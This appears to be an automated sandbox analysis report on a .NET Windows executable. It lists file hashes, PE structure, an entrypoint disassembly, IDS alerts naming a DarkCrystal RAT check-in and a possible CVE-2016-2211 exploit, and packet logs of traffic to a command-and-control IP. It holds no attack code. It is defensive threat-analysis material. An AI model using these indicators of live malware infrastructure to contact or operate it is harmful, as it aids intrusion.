                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):502
                                                                    Entropy (8bit):4.630609828667227
                                                                    Encrypted:false
                                                                    SSDEEP:12:PZg5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:RCdUOAokItULVDv
                                                                    MD5:E15540C580CF702F6C8BE9958C61CB2F
                                                                    SHA1:89B0FA335306144C0F2E7F652E0DE4BDC938292B
                                                                    SHA-256:BE4AAD886C653F42DB9D2C0A2977A2505E4415CBEF6283149FDA79A296AD7051
                                                                    SHA-512:F7CDDB2B7BB373852F03B932E170A18D10D4B3A8F2CF422FE5CF5F64EC0D0847D890FD44682CC2E552A82D4921CBCC41FB6A87B6CFC761ED8B05D74D8E71ADFE
                                                                    Malicious:false
                                                                    Preview:..Pinging 724536 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.457136013265021
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:EQdhBjQw4G.exe
                                                                    File size:1'719'296 bytes
                                                                    MD5:477db3de46b7779b63495a8bdb279f2c
                                                                    SHA1:77dc3f7d83728294c49298db82dd0e668adc3a73
                                                                    SHA256:8b0b6f7ba3c1c98fdc17ceb74e37057793e104dc92aa4d4319d71411b3e56366
                                                                    SHA512:4ac940fa7ce3c8a2a646639a5b00c5c8a1dcafcfba460782068446a321455cf5af10e1e6ae4e6753150beab7d2431a7c38192787b32c4e508b73f4b3ac843956
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    TLSH:1F858C1665E28E73C2B41B318156013E82E1D7667562FB1B3A1F2093A80B7F58F736B7
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:90cececece8e8eb0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x5a527e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x672125E5 [Tue Oct 29 18:13:57 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1a52300x4b.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a60000x320.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a80000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x1a32840x1a3400f338a68622aac0c83d7e3ad9273996c9False0.7531265140503876data7.4610435048156285IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x1a60000x3200x4002d725e62fa0c42d372df85f61a02d758False0.3525390625data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .reloc0x1a80000xc0x2003b644b6f25cb7417131a4ffa7ddd9644False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0x1a60580x2c8data0.46207865168539325

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-11-06T03:37:15.592448+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973037.44.238.25080TCP
                                                                    2024-11-06T03:37:17.712560+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449731TCP
                                                                    2024-11-06T03:37:57.199859+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449784TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 6, 2024 03:37:14.650751114 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:14.655664921 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:14.655750036 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:14.656441927 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:14.661299944 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:15.004076004 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:15.009835958 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:15.500901937 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:15.592390060 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:15.592447996 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:15.592714071 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:15.825807095 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:15.826157093 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.150788069 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.155685902 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:16.388700008 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:16.388885975 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.393693924 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:16.647361994 CET4973280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.652234077 CET804973237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:16.652309895 CET4973280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.652483940 CET4973280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.657229900 CET804973237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:16.702791929 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:16.828743935 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.857670069 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.859530926 CET4973480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.862999916 CET804973037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:16.863059998 CET4973080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.864399910 CET804973437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:16.864476919 CET4973480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.864624977 CET4973480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:16.869365931 CET804973437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.000858068 CET4973280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:17.006067038 CET804973237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.219523907 CET4973480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:17.224422932 CET804973437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.224513054 CET804973437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.467147112 CET804973237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.516232014 CET4973280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:17.540344954 CET804973237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.625655890 CET4973280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:17.676539898 CET804973437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.711169958 CET4973280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:17.716638088 CET804973237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.716917992 CET4973280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:17.734158039 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:17.739022970 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.739165068 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:17.739382029 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:17.744118929 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.756405115 CET804973437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:17.756669998 CET4973480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:18.094842911 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:18.099997997 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:18.561522007 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:18.615780115 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:18.634757996 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:18.641371965 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:18.646357059 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:18.925638914 CET4973480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:18.926711082 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.001209974 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.282094002 CET4973480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.408320904 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.778764963 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.779417992 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.779470921 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.779597998 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.779654980 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.780280113 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.780361891 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.780368090 CET804973437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.780378103 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.780424118 CET4973480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.780448914 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.780530930 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.780555964 CET4974080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.780575037 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.781090975 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781100035 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781111002 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781166077 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.781218052 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781248093 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781255960 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781265020 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781272888 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781285048 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.781296015 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781305075 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.781327963 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.781333923 CET804973437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.781342030 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.781358004 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.786073923 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.786087990 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.786097050 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.786106110 CET804974037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.786114931 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.786123037 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.786130905 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.786139965 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.790909052 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.790931940 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.790941000 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792515039 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792525053 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792534113 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792541981 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792557955 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792567015 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792577028 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792586088 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792594910 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792608023 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.792615891 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.792640924 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.792730093 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.799402952 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.799415112 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.799423933 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.799432993 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.799442053 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.799463034 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.799494982 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.804526091 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.804539919 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.804552078 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.804560900 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.804574013 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.804586887 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.804595947 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.804609060 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.804630041 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.809446096 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.809540033 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.809591055 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.809609890 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.809618950 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.809628963 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.809660912 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.809688091 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.814522982 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.814565897 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.814575911 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.814625025 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.819480896 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.819550037 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.819602966 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.819668055 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.824455023 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.824526072 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.824575901 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.824654102 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.829463959 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.829492092 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.829499960 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.829569101 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.829587936 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.829622030 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.829631090 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.829677105 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.829706907 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.829715967 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.829724073 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.829768896 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.834759951 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.834789991 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.834798098 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.834819078 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.834827900 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.834836960 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.834851027 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.834863901 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.834878922 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.834899902 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.834923029 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.835402966 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.835419893 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.835428953 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.835469961 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.839951038 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.839994907 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.840008020 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.840015888 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.840039968 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.840059042 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.840323925 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.840334892 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.840354919 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.840363026 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.840384960 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.840404034 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.841043949 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.841092110 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.844995022 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845057011 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.845084906 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845216990 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845248938 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.845266104 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845274925 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845293999 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.845331907 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.845388889 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845398903 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845406055 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845439911 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.845453978 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.845649958 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845731974 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.845871925 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.845947981 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850063086 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850141048 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850167990 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850177050 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850222111 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850236893 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850281954 CET4973680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:19.850297928 CET804973637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:19.850306988 CET804973637.44.238.250192.168.2.4
